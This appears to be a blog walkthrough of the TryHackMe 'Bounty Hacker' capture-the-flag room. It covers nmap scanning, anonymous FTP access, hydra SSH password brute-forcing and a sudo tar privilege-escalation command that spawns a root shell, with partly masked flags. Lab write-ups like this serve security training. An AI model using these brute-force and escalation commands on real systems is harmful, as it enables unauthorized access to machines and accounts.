CTF ChallengesTryhackme Walkthrough

Bounty Hacker Tryhackme CIF Challenge

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Bounty Hacker – Hello guys and welcome back, Ayush to this side, today we will talk about one of the tryhackme rooms “Bounty Hacker”, it’s quite an easy room where you will learn about FTP, hydra tool, and how you can do permission

escalation using tar command. So, any time, let’s get into it. Bounty Hacker


Bounty Hacker Room Link


Step_0Connect OpenVPN

First, Login tryhackme and download the configuration file from the access page below in the More menu as shown in Figure 1.2 below:

Go to Download Page


If you have already installed OpenVPN on your computer, otherwise you can install it by typing the following command: (Linux user sudo)

apt install openvpn -y


Once you have installed OpenVPN on your computer, go to the directory of this configuration file and enter the following command as shown in Figure 1.3 below:

openvpn Filename.ovpn

It will start connecting and when the terminal shows you that the sequence is complete as shown in the message in Figure 1.4, it means that your VPN is connected to the TryHackMe network.


If OpenVPN will not connect you then IP address will not work on your system. Will not come online.


Step_1Find open ports on the machine

First, we need to find the open ports on our target computer, but if you are a beginner, you will think about what is a port or port number, for them, here is a small explanation of the port number.

Port: Ports are nothing but unique numbers that are assigned to the many services running on your system to identify them on the network. For example, your firefox browser is running on port something 5543. Bounty Hacker

Now let’s come to the question, find open ports, so for that, we will use the Nmap tool which is used for port scanning, it helps us to find open ports, so let’s see what are the open ports on our target.

nmap -sV -sC -v

But here -sV is enough to find open ports and services needed for escalation, so let’s do it

Here you can see that there are 21,22,80 ports open so why not FTP to the target computer because anonymous login is enabled which means anyone can FTP to the server so let’s do it.



Step_2 – Login FTP & View File

FTP is a file transfer protocol that runs on port 21 and is used to transfer computer files between a client and a server on a network over port 21.


User: anonymous

Here you can see that we have access to the FTP server, let’s see what the files are, just type the ls command.


You can have two files here, just type get the filename to get this file on your system.

get locks.txt
get task.txt


Type exit and let’s read both files to get the answer of who wrote the task list.



cat locks.txt
cat task.txt

Here you can see that we have the writer’s name as in


Q2 Who wrote the task list? (User: lin)

  • lin



Step_4SSH Bruteforce

To do this, we brute force the user’s password using a lock.txt word list and the hydra tool.

hydra -l lin -P locks.txt -t 4 ssh

Now we have the password, now it’s time to ssh to the target.


Q3 What service can you brute force with a found text file?

  • SSH

Q4 What is the user’s password?

  • RedDr4gon******at3


Step_5 – Login SSH

Now we have the password, now it’s time to ssh to the target.

ssh lin@

After SSH server login type ls

cat user.txt

Now we have the user.txt flag and now we need to find the root.txt, first, we checked what permissions we have, and what actions we can perform as root.


Q5 user.txt

  • THM{CR1M3_S******T3}



Step_6 – sudo login

For this just enter sudo -l

sudo -l

Here you can see that we have tar command privileges as root. After that I searched how we can exploit using the tar command, then I got it from gtfobins.github.oi



sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And Type SSH Password. Now I enter whoami and then get root access.


Fine root.txt

locate root.txt


cat /root/root.txt

Q5 root.txt

  • THM{80UN7******3r}


Congratulations, we finally solved the lab, and thanks so much for your time, if you enjoyed this write-up and feel like this is; painful please share it with your friends and clap!!!


Disclaimer :

This was written for educational purposes only. You will not misuse information for unauthorized access. Doing any hacks without written permission is illegal ..!

All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security, and cyber security should be familiar to everyone who uses digital information and computers. The tutorials and videos Hacker guides are against the misuse of information and we strongly recommend against it.

All tutorials contain any illegal activity. We want to raise security awareness and inform our readers on how to avoid becoming a victim of hackers. If you intend to use the information for illegal purposes, please leave this website. We cannot be held responsible for any misuse of the information.


Hello, I'm SUMAN from India. I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty. I’m currently learning more about Web Design, Android ROM
Notify of
Inline Feedbacks
View all comments
Back to top button
Would love your thoughts, please comment.x